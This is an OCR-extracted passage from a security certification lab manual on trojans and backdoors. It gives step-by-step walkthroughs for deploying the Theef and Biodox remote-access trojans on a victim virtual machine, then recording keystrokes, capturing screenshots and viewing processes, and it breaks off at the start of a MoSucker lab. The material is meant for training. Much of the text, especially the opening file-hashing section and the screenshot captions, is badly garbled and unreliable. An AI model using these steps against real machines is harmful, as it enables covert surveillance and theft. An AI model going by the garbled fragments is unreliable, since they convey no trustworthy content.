f wr(W

□ havall92<4)
□haval266<6)
[” jpjw3J
Q h
‫ ח‬mefru21 8 1
2 (4

1»
0

1 |h*val192(5)
ha.*1 2 (3
24 )
r)|h»h
~|»ha b
| |np*mdl2fl
nirmdlM
[_|‫י*ייי‬
I 1nefru 1 8 1
2 (8
»«rfru225«M1

1

■

1 2

1

DtCEH-Too(>'CEH.3Module0 T c sand BackdoorsSFiles andFolder Integrity ChecUf(sumfrontend-1.S.S.lVitadme.ut
6 yan

■ j H :3 F 1 ‫■׳‬
_
y
*

f i LJ

.

Encoding: Ba.e 1 (hexadecim v] (~HMAC
6
al)

Fie
^ D:QH-IochThumb* d
b
(810C£h- (sCEH LabPrere—
k
■D'.CB+T clsCEH LabPrere‫־‬
.
CH):aH-T0cl5CEH«e lab Prerc-

10 8
0
0 /
8

0
0

‫ ז‬oc(sCEH/Slab Preret> F -TocisxCEH/S lab Prere_
C H
jij D H
:C 4-TocteC£ ( < LabPrere_
! •€
S£ O:CEH-TocbCEH‫ •׳‬LabPrere—
fejDACEH-TocttCB** LabPrere-.
J^D '.CFH-TocbSCEH^ lab Pit rf—
C£H-TochvClHv lab Prere_
| > ‫-ן‬j[>

£
3

11

<|

6

, J

Log

Vr.'

h p »u «etoviHagp
M y/1 m

FIGURE 8 1 FsumFrontEnd fileslist.
.4 :
40. C lick G enerate checksum files. The progress bar shows the progress
percentage com plete for the hash hies generated.
Fsum Frortend v1.5.5.1
Fsumfrontend
a L i Tools
: H 1Cakuiatehashes

I j 23‫ ־‬Ted

‫ה‬M ok1 6
r d( 9‫)׳‬
ih
]hawaT60G)

II (‫| ־‬K^^t224«4»

I fep Verify checksum1 es
4
: £ Generate checksumfi

Options
About

-1 U
1»
_]np«m«£i6

14*2(256)

[ h*‫׳‬all«0t4)
[‫־־‬
(5)

hvm
ati

r‫«״‬

l~ 1«p 32
ernd 0
I *»2G S4)

□hvll6( )
aa 05
□hv S(3
‫.״‬l26 )

3*d
n
S

Qrehsdi

‫252 *ח‬
0) 1(

T p-‫״״״‬

□hv19( ) C aa 9 [ )
a*124 ]hvl125
□hvl26 )
aa S (S
I |n d128
pem
□p *
jw
2

!‫ *־‬dbm
r lsoc6»

Q*h»0
[!***2C224J
5ncfru21
28f41 I Isnefru2 1 8(8)
2
?nrfru2 256fi

Clwval 192)5
(
)H haval2S6 )4(

U “1
*
•

□ K* 41224 31

0 **
‫יי‬
»

^ nprmdlfcO

Hs |
ah
File

Q Autoruns w ill
display a dialog
w ith a button that
enables you to re•
launch Autoruns
w ith
adm inistrative
rights

D:CEH-Tools'CEH.3f.lcdue06Trcjans ard Backdcois'sRIes andFolder Integrity Checkerfsum
frontend-1.53.1readm
e4tt

> 1 F| | [■y Ecdg Bs 1( eaeim ~] □MC
3
?» noin: ae6hxdc a v H A
l)
Fie
[hCB‫־‬MocHvThum*>vdb

(SPD.CtM-ToohCtH^ LabPrere0■D‘.CEHToclsCEH/S LabPrert_
‫־‬
O D:CtH-TooHCtHveLabPrgrgI0D ‫־‬
.OH-IocHXCEH* LabPiwu.
^ 0:CfH.Too»5SCfHv« lab Prert_
DCIH 1ee!*vC(M/fl lab Prcrc‫״‬
E0ClH-Ioo<iCIH4 LabP‫׳‬v«_
#)DACB4 ToobC& ‫ ״‬LabPrtrt+«
£ DCfH ToohCFH*« lab Prcre_
|4JDCtM-1
0ehC!Hw6lab Pr»r»...

FIGURE 8 2 FsumFiontEndGeneratech
.4 :
ecksu files.
m



1
X
J

Fsum Frontend * 27%

‫ם‬

1


Ku‫׳‬n fantcnd

Ir

a • . Took
1

W

C«kul4l*hMh«1

1 N ■ ‫״‬

‫ ־‬iMalhodbtWKt
ltwH6O0)

I twval1«>(4)

lhavaH60(5)

[ h*‫׳‬aM92(J)

□ h«v«H92(4)

4)224)• ^ ‫) ר‬

r *W
V4224 IS)
r

1 h«v#l S> J>
‫־‬
t<

r
|4
)
[ im m
iw im

□ h.v.l S (S)

[_ *pemdl«
shM? 064)

_J« h ‫״‬h
l*w?(S1?)

; (9.J Vwif, Lhw.Uun.t4c, ~ }m d /
‫•-׳‬jj 6«nwj:«th*ckium1i □
I
I

1

S*

;••cli Option*
1
••^Abool

File

2

C v a .V .
L

r Wfis

|h«val1M fS)
n !h «h

—
|nprmdl28
□ ihnO
|«h
Wffru212«(41 Iinf#ru
()

*
1

21? 8
8

h# 2 3)
v«!2 4
‫״‬Jilh « h
liprmdlM

2
2

W#ru K M

tv j.- .Ctiklop'Tet.til
Encoding: Ba.e 1 <hewdicim.il) v □
6

O You can also use the e
com and-line option to
m
launch initially launch
Autoruns with

26

File
D EM oc v
:C -1
Thuubvdb
I^D.CfcH-ToctsvCEH/* LabPrtfS■ D
:CB+Toc!sCB+<eLabPrereSHttOH-T c» CEH*labPrerc_

:1

05

53 D
'.CfcH octsC£H/SLib Preffc_
-1
D EH
AC -Toc*sC
&+/* LabPrcre_
ji, D:CB4-TockC£R.« LabPrrrr_
D EH oc(sC£Hv6 L«bPrere—
:C -T

hmac

|

‫׳‬nd5
B1 B 2 9
6 0 8 ...
C F5 0
482 9 ‫״‬
4C029WFJ40E83IC‫״‬

0 782DC31
D2 C
2 FF2C ...
3 85 9 ...
B A 6A
C 3 0 0 A 7 1 2 9 3 2 BA FM 7 |
7 3 5 E7 7 4 C 6 A S1 7 6 A
£)DA<B4-Too&CB*« LabPrere- E ECEDSA...
^I>CFH-Toc^CFH-eHbPrerc_ 08*2202-

3

<

8

-

j- , Log
Re

m
dS:

0

C:'U»*SAdmin««rjw< «ktopTestt«t
D eCDS»0CKGa13®09OGICFW2r£
41D

1 Extcuton:

(X O fcO C I
k C OO

Rc
II <
1

ft'CEH-Too•?‘Thunb^.d
b

1p, ‫׳‬llurri'f lOU'tffcXgF
FIGURE 8 3 FsumFrontEndp g ofh files.
.4 :
ro ress ash
41. The follow ing is die list o f 1
11d5 tiles after com pletion.

& CEH-Tools are
also located
mapped N etw ork
D rive (Z :) of V irtual
M achines

FIGURE 8 4 FsumFrontEndlist ofh shfiles.
.4 :
a

L a b A n a ly s is
your target’s security posture and exposure dirough public and free inform ation.





Q u e s t io n s
1.

Scenario: A lice wants to use T C P V iew to keep an eye 011 external
connections. H ow ever, sometimes there are large numbers o f connections
w ith a Rem ote Address o f "lo calh o st:# # # # ". These entnes do not tell
A lice anything o f interest, and the large quantity o f entnes caused useful
entries to be pushed out o f view .

2.

Is there any w ay to filter out the "lo calh o st:# # # # " Rem ote Address
entries?

3.

Evaluate w hat are the other details displayed by “ autoruns” and analyze the
w orking o f autonins tool.

4.

Evaluate the other options o f Jv l6 Pow er T oo l and analyze the result.

5.

Evaluate and list die algoriduns diat Fsum FrontEnd supports.

□

Y es

0 No

0 C lassro o m


0 iLabs



C r e a tin g a S e r v e r U s in g t h e T h e e f
T b e e f is a W in d m i s- b a se d a p p lic a tio n fo r b o th th e c lie n t a n d s e rv e r en d . T h e T h e e f
s e rv e r is a v iru s th a t y o n in s ta ll on y o u r v ic tim 's co m p u te r, a n d th e T h e e f c lie n t in
n h a ty o u th e n u se to c o n tro l th e v im s .

I CON

KEY

/ V a lu a b le
'
in fo r m a tio n

S

T est yo u r
k n o w l e d g e ____________

*

W e b e x e rc is e

A backdoor T rojan provides rem ote, usually surreptitious, access to affected
systems. A backdoor T rojan m ay be used to conduct distributed denial-ofservice (D D o S) attacks, 01‫ ־‬it m ay be used to in stall additional Trojans 01‫ ־‬other
form s o f m alicious softw are. F o r exam ple, a backdoor T rojan m ay be used to
in stall a dow nloader 01‫ ־‬dropper Trojan, w hich m ay 111 turn in stall a proxy
T rojan used to relay spam 01‫ ־‬a kevlogger T rojan, w hich m onitors and sends

£ Q ! W o r k b o o k r e v ie w

keystrokes to rem ote attackers. A backdoor T rojan m ay also open ports 011 the
affected system and thus potentially lead to further com prom ise by other
attackers.
stealing valuable data from the netw ork, and identity theft.

T lie objective o f tins lab is to help students learn to detect T rojan and backdoor
attacks.
J T Tools
dem onstrated in
th is lab are
availab le in
D:CEHToolsCEHv8
M odule 06 Trojans
and Backdoors

■

Creating a server and testing the netw ork for attack

■

D etecting Trojans and backdoors

■

A ttacking a netw ork using sample Trojans and docum enting all
vulnerabilities and flaws detected

To carry tins out, you need:
■


T h eef tool located at D:CEH-T00 lsC EH v 8 M odule 06 T rojan s and
BackdoorsTrojans TypesRem ote A cce ss T ro jan s (RA T)Theef



■

A com puter running W indow s Server 2012 as host machine

■

A com puter running W indow Server 8 V irtu al M achine (Attacker)

■

W indow s Server 2008 running 111 V irtual M achine (Victim )

■

A w eb browser w ith In tern et access

■

Adm inistrative privileges to nm tools

Tim e: 20 M inutes

O v e r v ie w


harmless programming or data in such a way that it can get co n tro l and cause
damage, such as ruining die file allocation table on a hard drive.
Note: The versions o f die created client or host and appearance o f die website may
differ from what it is 111 die lab, but die actual process o f creating the server and die
client is same as shown 111 diis lab.

Lab T ask s
TASK

1

1.

Launch W indow s Server 2008 V irtual M achine and navigate to Z:CEHToolsCEHv8 M odule 06 Trojans and BackdoorsTrojans TypesRem ote
A ccess Trojans (RAT)Theef.

2.

M

Double-click Server210.exe to run die Trojan on the victim ’s machine.

C reate Server
w ith Pro Rat

jija
* T‫׳‬ojans T /oes » denote Ac:e5s ‫־‬roiars (RAT) » Theef

L °‫ז‬
*°
I-I Date m iiied
cK

1-1 Type

M Sire

H

I 0 .C O
O ararr.n

B

O*ot?lO
Ed acrvcr210 e>e

I pass e
j readn-e.txt

ciders

v P|B9B9EBB
1 !■3upx.exe

Cemnond Shell ~ r w * I

^

JA Defacenent 'ro ja rs
^

D estruave T'oians

| . Ebsnong Trojans
J i E-Mal T'ojans
F P T r o ja r
£

GLlITro;ars
1
‫־‬rrTFH‫־‬T P S ‫ ־‬r0)ars

i t ICMP Bcddoor
^

MAC OS X Trojans

^

Proxy Serer Trojan:

Remote Access “ rtge
Apocalypse
^

Atelie‫ ׳‬web Renr>1

k). DarkCorretRAT __
^

ProRst
Theef

FIGURE 8 :WindowsServer2 0 - h efFolder
.1
0 8Te
3.

1 1 the Open F ile - Secu rity W arning w indow, click Run, as shown in die
1
follow ing screenshot.




Open File -Security Warning
The publisher could not be verified Are you sure you want to
run this software?
...emote Access Trojans (RAT)TheefServer210.exe

Name

I]

U n kno w n P u b lish e r

Publisher
Type

Application

From

Z:CEHv8 Module 0 6 Trojans and BackdoorsTrojan...

Run

Cancel

This file does not have a valid digital signature that verifies its
publisher. You should only run software from publishers you trust.
How can I decide what software to run ‫ל‬

't

FIGURE 8 :WindowsServer 2 0 - iityWarning
.2
0 8 Secu
4.

Launch W indow s 8 V irtual M achine and navigate to Z:CEHv8 M odule 06
Trojans and BackdoorsTrojans TypesRem ote A ccess Trojans
(RAT)Theef.

5.

Double-click Client210.exe to access the victim machine remotely.
|P .

T T ”

q

|
‫«־־‬

Applicator took

1

Home
‫־ 8־‬

Share
‫״‬

View

Trcjans Types ► Remote Access Trojans (RAT) ► Theef

£ Downloads
^

|

(j

| | Search Theef

©

fi |

Cl crt2'0.exe

j

iflj Ecitserer21 C.exe
pcss.dll

Recent places
|

39Libraries

v
v |

£ ccipara-n.ni

Favorites
■ Desktop

Theef

Manage

readmetxt
" Scanner.dll
‫«׳‬

[1 Documents
J '‫ ׳‬Music

■ Sever210.ex6

m Pictures

<6 zip.dl

■J

upx.exe

| j Videos
Homegroup

1

f f Computer

timLocal Disk (C:)
V CEH Tools (10.0.0.
Network

9 items

1 item selected S22 KB

FIGURE 8 :Windows 8 R n in C t2 0 e
.3
- u n g lien 1 .ex

6. 1 1 the Open F ile - Secu rity W arning w indow , click Run, as shown 111 die
1




Open File -Security Warning
Th e publisher could not be verified. A re you sure you w ant to run this
software?

S3

Name:

...pesRemote Access Trojans (RAT)TheefClient210.exe

Publisher U n kn ow n Publisher
Type

Application

From:

Z:CEHv8Module06Trojansand BackdoorsNTrojans T...

Run

Cancel


H wc nI d ew at so a to ru ?
o a ecid h ftw re n

FIGURE 8 : W
.4 indows 8 Secu W
- rity arning
7.

The maui w indow o f Th eef appears, as shown 111 die follow ing screenshot.
‫ ׳‬n e e tv ^ iu

1^

0‫־‬

C onnect

■
>
‫׳‬

C onnect

A

Port

6703

FTP

2968

D isco n n ect

☆

T h e e f version 2.10 01/N o‫׳.׳‬em ber/2004

FIGURE 8 :TheefMainScreen
.5

8.

En ter an IP address 111 the IP held, and leave die Port and FTP tields as dieir
defaults.

9.


1 1 diis lab we are attacking W indow s Server 2008 (10.0.0.13). Click
1
C onnect after entering die IP address o f W indow s Server 2008.



T T 7T ie e f v 2 10
C onnect

Port

C onnect

670
3

FTP

2 968

D isco n n ect

A
C omputer inform ation

FIGURE 8 :TheefC
.6
onnectingtoVictimM
achine
10. N ow ill W indow s 8 you have access to view the W indow s Server 2008
machine rem otely.
ro

-h e e fv .2 .1 0
C onnect

10.0.0.13

-

C onnect

Port

6 703

FTP

2 968

D isco n n ect

[15:05:31] A ttem pting co nnection w ith 10.0.0.13
[15:05:31] C onnection esta b lish ed w ith 10.0.0.13
[15:05:31] C onnection a cce p te d
[15:05:31] C onnected to tra n s fe r port

A

% •Qj SY &

C onnected to s e rv e r

FIGURE 8 :TheefGaineda ssofVictimM
.7
cce
achine
11. T o view die com puter inform ation, click die Com puter icon at die bottom
o f die window.
12. 1 1 Com puter Inform ation, you are able to view PC D etails. O S Info, Home,
1
and N etw ork by clicking on die respective buttons.




C om puter Inform ation

Reply PCDetails re ceive d

FIGURE 8 : TheefCom
.8
pute! Inform
ation
13. C lick die Spy icon to capture screens, keyloggers, etc. o f the victim ’s
machine.
p r TTieef v.2.10
C om puter Inform ation
U ser name: A d m in is tra to r
C om puter name: WIN-EGBHISG14L0
R egistered organisation: M ic ro s o ft
R egistered o w n e r: M ic ro s o ft
W o rkg rou p : [U n kno w n ]
A va ila b le mem ory: 565 Mb o f 1022 Mb
P ro cesso r: G enuinelntel In te 6 4 Family 6 Model 42 S tepping 7 (3 09 5 M hz)
D isplay res: 800 x 600
Printer: [U n kno w n ]
Hard drive s:
C: (6,186 Mb o f 16,381 Mb fre e )

PC Details

<#] OS Info

^5

Home

N e tw o rk

FIGURE 8 :TheefSpy
.9
14. Select Keylogger to record the keystrokes o l die victim .
15. 1 1 the Keylogger window, click die Play button to record the keystrokes.
1




Keylogger [Started]

cv

‫־‬j
*

FIGURE 8 : TheefKeyloggei Window
.9
16. N ow go to W indow s Server 2008 and type some text 111 Notepad to record
die keystrokes.
Keylogger [Started]

[New Text Document.txt - Notepad]
HiBob{BACKSRACE}{BACKSPACE}{BACKSPACE}
Billy U have been hacked by the world famouse
{BACKSPACE} hacker.j[CTRL}{CTRL}{ALT}

*51

tv

< ?

©

FIGURE 8 0 TheefrecordedKey Strokes
.1 :
17. Sim ilarly, you can access die details o f die victim ’s machine by clicking die
respective icons.

L a b A n a ly s is
your target’s security posuire and exposure dirough public and free inform ation.





T o o l/ U tility

O u tp u t:

Theef

V ictim s m achine PC Inform ation
V ictim s m achine keystorkes

Q u e s t io n s
1.

Is there any way to iilter out the "localhost:# # # # " remote address entries?

2.

Evaluate the other details displayed by “ autoruns” and analyze the working
o f the autonins tool.

□ Y es

0 No

0 C lassro om


0 !Labs



C r e a tin g a S e r v e r U s in g t h e B io d o x
T h e e f is a W in d o w s b n sed a p p lic a tio n fo r b o th th e c lie n t a n d s e rv e r en d . T h e T h e e f
s e rv e r is a v im s th a t y o n in s ta ll on y o u r v ic tim s co m p u ter, a n d th e T h e e f c lie n t in
n h a t y o n th e n u se to c o n tro l th e v iru s .

I CON

KEY

/ V a lu a b le
'
in fo r m a tio n

T est yo u r

include protecting die netw ork from Trojans and backdoors, T rojan attacks,

k n o w le d g e
—

W e b e x e rc is e


ca


attacks.
‫י‬
‫י‬


■

& Tools
dem onstrated in
th is lab are
availab le in
D:CEHToolsCEHv8
M odule 06 Trojans
and Backdoors

Creating a server and testing the netw ork tor attack

vulnerabilities and flaw s detected

To earn‫ ״‬tins out, you need:
Biodox tool located at D:CEH-ToolsCEHv8 M odule 06 T ro jan s and
BackdoorsTrojans TypesG UI TrojansBiodox Trojan

■

A com puter running W indow s Server 2012 as H ost M achine

‫י‬

A com puter running W indow Server 8 V irtual M achine (Attacker)

‫י‬


‫י‬


‫י‬


■

Adm inistrative privileges to m n tools



Tune: 20 M inutes

O v e r v ie w


harmless programming or data 111 such a w ay that it can get co ntro l and cause
damage, such as ruining die file allocation table on a hard dnve.
d ille r from w hat it is 111 die lab, but die actual process o f creating die server and die

Lab T ask s
1

1.

C reate Server
w ith ProRat

Trojans and BackdoorsTrojans TypesGUI TrojansBiodox Trojan.

2.

Double-click BIO D O X O E Edition .exe to m il die Trojan on die victim ’s
machine.

m

TASK

r w ‫'־‬
I 1 Home
0 *) t

Vievr

B io d o x

Manage

« ‫ , ,־,ז‬nsTypcs

v| C, |

► GUITrojans ► Bo cox Tiojen ► Biodox

| Search Biodox

v©
*.

Jl. Language

Favorites
W

Applicator took
Shaic

Pbgns

Desktop

£ Downloads

; 3 BI3COX CE Edrtion.e<e]
' Leeme

Recent places

& MSCOMCTL.OCX
j * MSW1NSOCOCX

3 9 Libraries
H ) Document?
Music
B

A res.qf
g

sewings.ini

Pictures

|§ j Videos

FIGURE 9 :Windows 8- d xContents
.1
Bio o
3.

11 the Open F ile - Secu rity W arning window, click Run, as shown in
1
Open File ‫ ־‬Security Warning
software?

N m : ...I T ja sB d x ro B d x IO O O Ed n x
a e
ro n io o T jan io o B D X E itio .e e
Publisher Un kn ow n Publisher
T e Ap
yp : p licatio
n
F m Z E v8M u 0 T ja sa dB ck o rsT ja sT
ro : :C H od le 6 ro n n a d o ro n ...
Rn
u

Cn l
a ce

T isfile d e n t h veavalid d sig a rethatverifies its
h
os o a
igital n tu
p b e Y ush u onlyru so a fro p b e yo tru
u lish r. o o ld
n ftw re m u lish rs u st.
H wc nI d ew at so a to ru ?
o a ecid h ftw re n
FIGURE 9 :Windows 8 Secu Warning
.2
- rity




4.

Select yourpreferred language from die drop-down list 111 die Biodox main
window: 111 diis lab we have selected English.
B d xO e S u eE itio
io o p n o rc d n

£3commun
A passwor
manage
keyboar
msn sett
O g settings________

0 system information
(5 fin manager
1
;
y commands
f 1 capture
server properties

local tools
|w contact us

P
oet

Correction
f f Cermet tkn

ua>

6661

g Transfer
Bs<r#*n
5 WebCam

6662
6663
6664

User Name

Computer...

Admin

Coded By W ho! | w h o @ tikk ys o ft.c o m

S t a t u s : R e a d y ...

----- --

FIGURE 9 :Windows 8 d m windowla g a eselectio
.3
-Bio ox ain
n ug
n
5.

N ow click die Server Editor button to build a server as shown 111 die
io o p n o rc d n

□.-----

-Fake Error Message ‫־‬
3

commenfcaton

£ ‫ ־־־‬passwords
manage files
‫ נ‬keyboard
P msnsetbnos
$ settings manage'
O systenr nfb‫־‬matDn

3

‫ יוד‬fu i manaoer
g> commands
p
J capture
^
5j server propprtiet
local tools
M contact us

□ 0 0

; Msg Title

| Test Message |

Message Icon :

©
r VictimNa
Name:

Connection;

|61
66

‫צג‬
| Saeen Capture;

|6663 |

Transfer:|666? | webcam Capture: |6664 |

[‫ ־‬Connection Delay ‫־‬
connection

QUvf^l c#<‫ .־‬for ronn^ftioi
O Windowo

-Regetry Sertnqs ‫־‬
K*y:
mssrs:

Correction
*3 Connection
S Transfer
? ? Saeen
5 WebCam

Error*

|biodox w a s here

IP /[* S Adress:

0 Sy8tem32

O Temp

Server Mode‫־‬
(• Gizli Mod
>

O Yardyrr Moou

s

Pxt
6561
6562
6563
6564
Admin

| Opera tin... | Cpu

| Ram

Coentry

active / deactive status

Status : Read/...

FIGURE 9 :Windows 8 Secu Warning
.4
- rity

6. 1 1 Server Editor options, enter a victim ’s IP address in die IP/DNS field; 111
1
this lab we are using W indow s Server 2008 (10.0.0.13).



7.

Leave die rest o f die settings at dieir defaultd; to build a server click die
C reate Server button.

Note: IP addresses may ditter 111 your classroom labs.
io o p n o rc d n
| H

Server Editor

7

------

!13 commuucaton

□ 0 0

£

passwords
manage files
keyboard
msn settings
settings maTage‫־‬
^ systerr nfo‫־‬maton
ti fir manager
jj1 commands
‫׳‬
capture
j server properties
■ k>:al tools
‫*׳‬f
'‫ )ס‬contact us
‫ץ‬

-IP/DfsS--Adress: 1
10.0.0 1 |
3

Msg Title :

|ErfQH

Message :

|biodox was here

I

Message Icon :

©

1

Name:

2

1
-

|v‫־‬
ictim

Connection Delay —

Da| n * C
dyi0 *

-Registry Settings‫־‬
K ey:

mssrs32

Vakje:

_!‫צ‬

Connection: [6661

| Screen Capture: [6663

Transfer:|6662

| webcam Capture: [6664

OWindows

OTemp

Vetim W
ame

0 5ystem32

■
Server Mode-

mssrs32.exe

© Gizii Mod
Correction
?5 Connection
® Transfer
?? Screen
S WebCam

|

|

O Yardyn‫ ־‬MoCu

Port
6561

0

J_ £
UJ

6562
6563
6564

IP Adress

UserNarre

Computer...

Admin

Operatin...

Cpu

Status : Read/...

Ram

Couitry

create server

FIGURE 9 : BodoxMainScreen
.5
Server.ex e tile w ill be created 111 its default directory: Z:CEHv8 Module 06
Trojans and BackdoorsTrojans TypesGUI TrojansBiodox Trojan.

‫׳‬

Applicator Toots

|

|

Home

5 0 - ♦g
-T Favorites
E

Desktop

4 Downloads
‘kl Recent places

Share

View

B io d o x

Manage

« Trcjans Types ► GUITrojons ► D-odox Trojcn ► Biodox

"S’

©

v|C | | Scorch Biodox

J4 Language
M P lj9 ‫ ״‬t
BIOCOX Cb tdition.exe
jp U in w
MSCOMCTL.OCX

Libraries
0

Documents

J'' Music
B

Pictures

0

gM S W 1 N S < X 0 C X
£ res.g1
f
p i / [ server.exe")
ft 5ertingj.ini

Videos
-

FIGURE 9 : Bodoxservices
.5
9.


N ow switch to W indow s Server 2008 V irtual M achine, and navigate to
Z:CEHv8 Module 06 Trojans and BackdoorsTrojans TypesGUI
TrojansBiodox Trojan to m il die server.exe die.



’ r0)or» "ypea - GUI Trojon* - 3‫׳‬odo<c Tro,0‫ - ־‬Biodox ■
n
‫׳‬
Pile

edit

/1eA‫׳‬

‫־‬oote

Crg»m:e ~

1
ewfl

‫ ־־‬i t t J i F -

&

le p
»

(__ opcri

a
I *I

Fa/orite Links

tnodfi«d

Ms..

I * I Typ*

I•
I

I i^ tu n
P gs

1 ‫ ־‬Docuncnts

% P
1 ictures

4 I b1XO^ Or &4tor.ete
p Leetre

R j Music

<£ m 5c <*‫׳‬c t . . ocx

M
ore »

£MSMNSCX.OOf

i^ ra g
se n s.r

... .*jm-r.

i.
^

3iodo!c Trojsn
J . Bkxlox

i t Language
J4 Pogne

FIGURE 9 : Bodoxse r.e e
.6
rve x
10. Double-click server.exe 111 W indow s Sender 2008 virtual m acliine, and click
Run 111 die Open F ile - Secu rity W arning dialog box.
‫ ן‬Open File

-Security Warning

The publisher could not be verified. Are you sure you want to
run this software?

E

Name:
Publisher:
Type:

.. .pesGUI Trojans'Biodox Tr0jatVf310d0xserver.exe
U n k no w n P u b lish e r
Application

From: Z:CEHv8 Module 06Trojans and Backdoors Trojan...

Run

•

tg V

Cancel

How can I decide what software to run*

FIGURE 9 : Runthetool
.7
11. N ow switch to W indow s 8 V irtual M acliine and click die active/deactive
statu s button to see die connected machines.




Biodox Open Source Edition
Server Editor

□‫------־‬■

-Fake Error Message —

rScommuiicaton

□ Q S

passwords
manage ftes

‫כ‬

Msg Tlllc ;

fla msnsettjnos
settings ma-iage‫׳‬
‫־‬
O system info-maoxi
‫ #.׳‬finmanaoer
‫•. ־‬
jj‫ ׳‬commands
[_jj capture
server properties
loal tools
contact us

3
A
“
)

|br-or

Message:

j keyboard

[biodox w

Message Icon :

Adress: 10.0.013
- Vctim flame‫־‬
Name: Ivic

Connection: [6661

| Saeen Captjre :

|6663

Transfer:|66s?

D^ayjiO I

O

1ee. ‫ זכי‬connectioi

-Regetry SewingsKey:
mssrs:

Windows

Transfer

O Yardyrr Mocu

Pxt
6561
6962

® Saeen
S WebCam

0 System32

Temp

•server M ode© Gizli Mod

Connection
S Connection

|

| webcam Capture: |6664 |

O

r connection Delay-

6563
6564

Vctom Name

IP Adress

User Narre

Cornputcr...

Admin

Operatin...

Cpu

Ram

Status : Settings saved and server created(

Country

active / deactive status

FIGURE 9 :Bodoxopenso rceeditior
.8
u
12. A fter getting connected you can view connected victim s as shown 111 die

B d xOe S uc E itio
io o pn o r e d n
® ‫1 ש‬

3 communicaton
2‫ ־‬passwords
‫'־‬
manage fles
keyboard
msn settinos
settings maTage‫־׳‬
Q system information
•$‫ ׳‬fin manager
§> commands
| j | capture
ijj server prop»rt »c
‫ ־־‬local tools
^}) contact us

1

‫0 0 ם‬

-----[Errofl

Message :

Adress: 10.0.013

Msg T itle :

|biodox w a s here

Message Icon ;

©

---

Connection: |6661
r Connection Delay —
o«l»y|10 |

fer ‫־‬

mssrs32

‫צב‬

V

| Saeen Captjre:

|6663

|

Transfer:[6662 | webcam Capture: |6€€4 |
- Install Path-------------------

O
K ey:

|

Windowo

O

Temp

r Server ModeO Yordyro Modu

:

mssrs32 e:

:or rc
net n
S
S
‫לי‬
S

Connection
Transfer
Saeen
WebCam

6561 I
6562
6563
6564

J/D

. IP Adress_____ UsstNatifi___ CaniButfir...__ Admin_____ Qpsratin..._ Cpu
_

Adrrinistr...

WIN-EGB..

W Vista
in

3D93

0.99 GB United.

Status : d ien t Active

FIGURE 9 :Bodoxopenso rceeditior
.9
u
13. N ow you can perform actions w ith die victim by selecting die appropriate
action tab in die left pane o f die Biodox window.
14. N ow click the setting s m anager option to view the applications running
and odier application settings.




Biodox Open Source Edition

@ 01

Name

Path

Memory ...

0

System

0

Priority

H*J cytttm

keyboard

fla msnsettmas
9 settings maTagy
1 apjlicatons ~|
1 ao^icaton setbnos
A
ex3lore‫ ׳‬setings
C3 pmt
^ services
0 system information
‫ •$׳‬fun manager
.
jj1 commands
‫׳‬
^ capture
j server properoe;
local tools
W) contact us

£

A

Connection
5 Connection

Syetam
System

929792

Normal

H 3 csrss.exe

a

0

432
500
544

System

5701632

Normal

System

7430144

Normal

H•!! wmm1
t.e>e

552

System

4849664

Hiob

L.-J ‫.׳‬unlogon exe

580

System

6287360

servces.exe

628

System

7188480

Normal

IQ kass.exe

640

System

10821632

Normal

5llsm .exe

csrss.exe

High

648

System

4812800

836

System

6418432

Normal

svd‫־‬ost.exe

896

System

7192576

Normal

svehost.exe

992

System

9965568

Normal

1015

System

7016448

Normal

244

System

33181695

Normal

296

System

12562432

Normal

360

System

12091392

Normal

iij l svchost.exe
svd-ost.exe
iiJdsvc.exe
svcfost.exe

0
H
B
0
□
11
*
‫וזיו‬
‫1 --------ן‬

Normal

svd‫־‬ost.exe

Pxt

Transfer

4

23smss.exe

msnags fles

j

PID

S I (system pr...

rScommuiicaton
A passwords

v

6962

® Screen
® WebCam

6561
6563
6564
? Adress

User Narre

Computer...

Admin

Admmstr...

WIN-EGB...

True

Operatin...

Cpu

Status : successfully

0.99 GB United...

Clear Application List

FIGURE 9 : Bocloxopenso editor
.9
urce
15. Y o u can also record die screenshots o f die victim by clicking die Screen
Capture button.
16. C lick die Sta rt Screen Capture button to capture screenshots o f die
victim ’s machine.

FIGURE 9 0 screencap re
.1 :
m
17. Biodox displays the captured screenshot o f the victim ’s machine.




V

41 *

‫ס‬

*

Saeen Capture

** V

x

Rctydean

&

a

9

SL

B

Nr* Te*t
Doa1H0w.txT

FIGURE 9 1 screencap re
.1 :
tu
18. Sim ilarly, you can access die details o f die victim ’s machine by clicking die
respective functions.

L a b A n a ly s is
your target’s security posmre and exposure dirough public and tree inform ation.


T o o l/ U tility
B io d o x

In fo rm a tio n C o lle c te d / O b je ctive s A ch ieved
O u tp u t:
Record the screenshots o f the victim m achine

□ Y es

0 No

0 C lassro o m


0 !Labs

AH Rights Reserved. Reproduction is Stricdy Prohibited.


C r e a tin g a S e r v e r U s in g t h e
M oS u cker
M o S u c k e r is a

V is u a l B a s ic T ro ja n . A lo S u k e r's e d it s e rv e r p ro g ra m

h a s a c lie n t

w ith th e sam e la y o u t a s s u b S e v e n ' c lie n t.
s

I CON

KEY

[£ Z 7 V a lu a b le
in fo r m a tio n ________

.y v

T est vo u r

A backdoor is a secret or unauthorized channel fo r accessing com puter system.

111 an attack scenario, hackers in stall backdoors on a m achine, once
com prom ised, to access it 111 an easier m anner at later tim es. W ith the grow ing

k n o w le d g e _________

**

use o f e-com m erce, w eb applications have becom e the target o f choice for

W e b e x e rc is e

attackers. W ith a backdoor, an attacker can virtu ally have fu ll and undetected
access to your application for a long tim e. It is critical to understand the ways

<‫ ־‬r • . W o r k b o o k r e v ie w

backdoors can be installed and to take required preventive steps.
theft ot valuable data trom the netw ork, and identity thett.

The objective o f this lab is to help students learn to detect T rojan and backdoor
attacks.
I T Tools
dem onstrated in
th is lab are
availab le in
D:CEHToolsCEHv8
M odule 06 Trojans
and Backdoors

■

Creating a server and testing the netw ork for attack

■


■

vulnerabilities and flaws detected

To carry tins out, you need:
■

‫י‬


M oSucker tool located at D:CEH-ToolsCEHv8 M odule 06 T ro jan s and
BackdoorsTrojans TypesG UI TrojansM oSucker
A com puter running W indow s Server 2012 as host machine



■

A com puter rum iing W indow Server 8 V irU ial M achine (Attacker)

■


■


■

Adm inistrative privileges to run tools

Tim e: 20 M inutes

O v e r v ie w


A Trojan is a program that contains m alicio u s or harm ful code inside apparendy
harmless programming or data 111 such a w ay that it can get co n tro l and cause
damage, such as ruining die hie allocation table on a hard drive.
differ from w hat it is in die lab, but die actual process o f creating die server and die

Lab T ask s
3
_

t a s k 11.

C re a te S e rv e r

w ith Pro R at2.

Trojans and BackdoorsTrojans TypesGUI TrojansM oSucker.
Double-click die C reateServer.exe hie to create a server.
F

- p

i

|

‫־‬

* _

Sh

“

View

